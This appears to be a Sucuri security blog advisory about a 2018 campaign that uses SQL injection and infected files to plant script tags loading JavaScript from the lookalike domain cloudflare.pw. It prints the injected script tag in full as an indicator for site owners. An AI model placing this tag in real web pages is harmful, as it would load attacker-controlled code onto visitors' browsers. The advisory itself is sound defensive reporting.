• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Fake Cloudflare Injection

August 8, 2018Fioravante Souza

0
SHARES
FacebookTwitterSubscribe

Seeing malicious campaigns using domain names that resemble big market players is not news anymore. This time I\’ll talk about the new redirects of cloudflare.pw.****

The domain, registered in 2017, has been used as a doorway to other suspicious content since then.

But this time it looks like they want to leverage the SSL adoption rush to hide the infection, since the script is loading content from https://*.contentssl.com.

The attackers are not only infecting files but it seems they are exploiting SQLinjection vulnerabilities to add the following javascript to the database too:

<script id="lg210a" src="https://cloudflare.pw/cdn/statslg30.js" type="text/javascript"></script>

The script id and the remote javascript file called can change. The file can be either statslg[30 or 50].js or statslelivros20.js. All those variations will load similar js. The only difference will be the final host, keeping the contentssl.com domain.

We also found fake Jquery scripts injected on infected sites, so, if you see any of those entries on your site, perform a full check on it.

0
SHARES
FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, Website SecurityTags: Labs Note, SQL Injection

About Fioravante Souza

Fioravante "Fio" Souza is Sucuri’s Vulnerability Research & Machine Learning Manager who joined the company in 2012. Fio’s main responsibilities include dealing with emerging web threats. His professional experience covers 18 years of information security. When Fio isn’t dealing with web threats, you might find him fermenting everything he can find. Connect with Fio on Twitter or Untappd.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.